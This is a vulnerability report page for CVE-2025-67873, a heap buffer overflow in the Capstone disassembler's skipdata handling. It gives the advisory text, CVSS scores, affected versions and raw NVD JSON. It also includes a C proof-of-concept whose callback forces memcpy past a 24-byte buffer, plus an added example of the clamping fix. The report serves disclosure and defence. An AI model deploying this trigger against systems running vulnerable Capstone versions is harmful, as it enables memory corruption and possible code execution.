Security Vulnerability Report
CVE-2025-67873 CVSS 4.8 MEDIUM

CVE-2025-67873

Published: 2025-12-17 22:16:00
Last Modified: 2026-01-02 18:39:55

Description

Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into cs_insn.bytes, causing a heap buffer overflow in the disassembly path. Commit cbef767ab33b82166d263895f24084b75b316df3 fixes the issue.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:capstone-engine:capstone:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha4:*:*:*:*:*:* - VULNERABLE
Capstone 6.0.0-Alpha5 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * CVE-2025-67873 PoC - Capstone Skipdata Heap Buffer Overflow
 * This PoC demonstrates the heap buffer overflow in cs_insn.bytes when
 * a malicious skipdata callback returns an oversized length value.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "capstone/capstone.h"

// Malicious skipdata callback that returns oversized length
static size_t malicious_skipdata(const cs_insn *insn, size_t count, void *user_data)
{
    printf("[+] Malicious skipdata callback invoked\n");
    printf("[+] Original insn->size: %u, bytes[0-3]: %02x %02x %02x %02x\n",
           insn->size, insn->bytes[0], insn->bytes[1], insn->bytes[2], insn->bytes[3]);
    // Return a length larger than 24 bytes to trigger overflow
    // cs_insn.bytes is typically 24 bytes, overflowing it causes heap corruption
    return 100; // This will cause memcpy to write 100 bytes into 24-byte buffer
}

int main(int argc, char **argv)
{
    csh handle;
    cs_insn *insn;
    size_t count;

    // Sample x86 binary code (will trigger skipdata handling)
    unsigned char code[] = {
        0x90, 0x90, 0x90, 0x90, // NOPs
        0x0F, 0x01, 0xFF,       // Invalid/extended instruction
        0x66, 0x90,             // Another instruction
        0xCC, 0xCC, 0xCC        // INT3 padding
    };

    printf("[*] CVE-2025-67873 PoC - Capstone Heap Buffer Overflow\n");
    printf("[*] Target: Capstone <= 6.0.0-Alpha5\n\n");

    // Initialize Capstone in SKIPDATA mode
    if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
        printf("[-] Failed to initialize Capstone\n");
        return 1;
    }

    // Enable skipdata mode with our malicious callback
    cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON);
    cs_option(handle, CS_OPT_SKIPDATA_MODE, CS_SKIPDATA_CALLBACK);

    // Set the malicious skipdata callback
    cs_set_skipdata_func(handle, malicious_skipdata, NULL);

    printf("[*] Disassembling %zu bytes of code...\n", sizeof(code));

    // This call will trigger the overflow when skipdata callback returns 100
    count = cs_disasm(handle, code, sizeof(code), 0x1000, 0, &insn);
    if (count > 0) {
        printf("[+] Disassembly completed, %zu instructions\n", count);
        for (size_t i = 0; i < count; i++) {
            printf("  0x%lx: %s %s\n", insn[i].address, insn[i].mnemonic, insn[i].op_str);
        }
        cs_free(insn, count);
    } else {
        printf("[-] Disassembly failed: %s\n", cs_strerror(cs_errno(handle)));
    }

    cs_close(&handle);
    printf("[*] Test completed\n");
    return 0;
}

/*
 * Compilation:
 *   gcc -o poc poc.c -lcapstone
 *
 * Expected behavior:
 *   - Heap buffer overflow when memcpy writes 100 bytes into cs_insn.bytes[24]
 *   - May cause crash or be exploitable for code execution
 *
 * Mitigation:
 *   - Upgrade to Capstone version with fix (commit cbef767)
 *   - Validate skipdata callback return values
 */
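The mitigation note above ("validate skipdata callback return values") is the whole fix in one sentence. As an added example, not Capstone's code and not part of the PoC, the following models the bounds check a skipdata-style data path needs: the callback-supplied length is clamped to both the remaining input and the 24-byte instruction buffer the description names before any memcpy happens. The struct, callback and function names (model_insn, skipdata_len_cb, clamp_skip_len, fill_data_insn, demo_consume_all) and the callback signature are assumptions for this model, not Capstone identifiers; the 12-byte input is constructed.

```c
/*
 * Added example: a model of the bounds check behind the CVE-2025-67873 fix.
 * All names and layouts here are assumptions, not Capstone's own API.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define INSN_BYTES_MAX 24   /* size of cs_insn.bytes as stated in the description */

/* Minimal stand-in for the instruction record (assumed layout). */
typedef struct {
    uint64_t address;
    uint16_t size;
    uint8_t  bytes[INSN_BYTES_MAX];
} model_insn;

/* Callback type: returns how many bytes to treat as data (assumed signature). */
typedef size_t (*skipdata_len_cb)(const uint8_t *code, size_t code_size,
                                  size_t offset, void *user_data);

/*
 * Clamp a callback-supplied skip length so the copy into the fixed buffer can
 * never exceed it and never runs past the end of the input.
 * Returns 0 when nothing can be skipped (nothing remains, or callback asked for 0).
 */
size_t clamp_skip_len(size_t requested, size_t code_size, size_t offset) {
    if (offset >= code_size) return 0;
    size_t remaining = code_size - offset;
    size_t len = requested;
    if (len > remaining) len = remaining;        /* do not read past the input */
    if (len > INSN_BYTES_MAX) len = INSN_BYTES_MAX; /* do not write past the buffer */
    return len;
}

/*
 * Fill a "data" pseudo-instruction at `offset`. An unchecked version would
 * memcpy `requested` bytes straight from the callback; this one clamps first.
 * Returns the number of bytes consumed (0 when refused).
 */
size_t fill_data_insn(model_insn *out, const uint8_t *code, size_t code_size,
                      size_t offset, uint64_t base, skipdata_len_cb cb,
                      void *user_data) {
    size_t requested = cb(code, code_size, offset, user_data);
    size_t len = clamp_skip_len(requested, code_size, offset);
    if (len == 0) return 0;
    memset(out, 0, sizeof *out);
    out->address = base + offset;
    out->size = (uint16_t)len;
    memcpy(out->bytes, code + offset, len);  /* len <= INSN_BYTES_MAX by construction */
    return len;
}

/* Constructed callback that asks for far more than the buffer holds. */
static size_t oversized_cb(const uint8_t *code, size_t code_size,
                           size_t offset, void *user_data) {
    (void)code; (void)code_size; (void)offset; (void)user_data;
    return 100;
}

/* Walk a constructed 12-byte buffer with the oversized callback; returns bytes consumed. */
size_t demo_consume_all(void) {
    const uint8_t code[12] = { 0x90, 0x90, 0x90, 0x90, 0x0F, 0x01,
                               0xFF, 0x66, 0x90, 0xCC, 0xCC, 0xCC };
    model_insn insn;
    size_t off = 0, step;
    while ((step = fill_data_insn(&insn, code, sizeof code, off, 0x1000,
                                  oversized_cb, NULL)) > 0) {
        printf("0x%llx: .byte x%u\n", (unsigned long long)insn.address, insn.size);
        off += step;
    }
    return off;
}

int main(void) {
    size_t n = demo_consume_all();
    printf("consumed %zu bytes without exceeding the %d-byte buffer\n", n, INSN_BYTES_MAX);
    return 0;
}
```

With the 12-byte input, a callback answer of 100 is clamped to 12 (the remaining input); on a longer input it is clamped to 24 (the buffer), which is exactly the limit the unpatched path lacked. Whichever limit is tighter wins, so the memcpy can never write outside `bytes`.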

References

https://github.com/capstone-engine/capstone/commit/cbef767ab33b82166d263895f24084b75b316df3 (Patch)
https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67873", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:00.147", "lastModified": "2026-01-02T18:39:54.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into cs_insn.bytes, causing a heap buffer overflow in the disassembly path. Commit cbef767ab33b82166d263895f24084b75b316df3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "DD22C7C2-F647-4AB5-BEB4-C70F722C0419"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "99F76525-F73B-4F66-AE46-A1ECAF0C7A0C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "442C7F48-5BEE-4702-AC0F-DE5C70FAA93F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "3C88415A-376C-4F7F-9D7D-3CB5C8FB9346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "67358CE5-F734-4E55-B021-D3AC5D937DD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "9DED59B8-DC00-4323-89FA-044F7666AF5D"}]}]}], "references": [{"url": "https://github.com/capstone-engine/capstone/commit/cbef767ab33b82166d263895f24084b75b316df3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}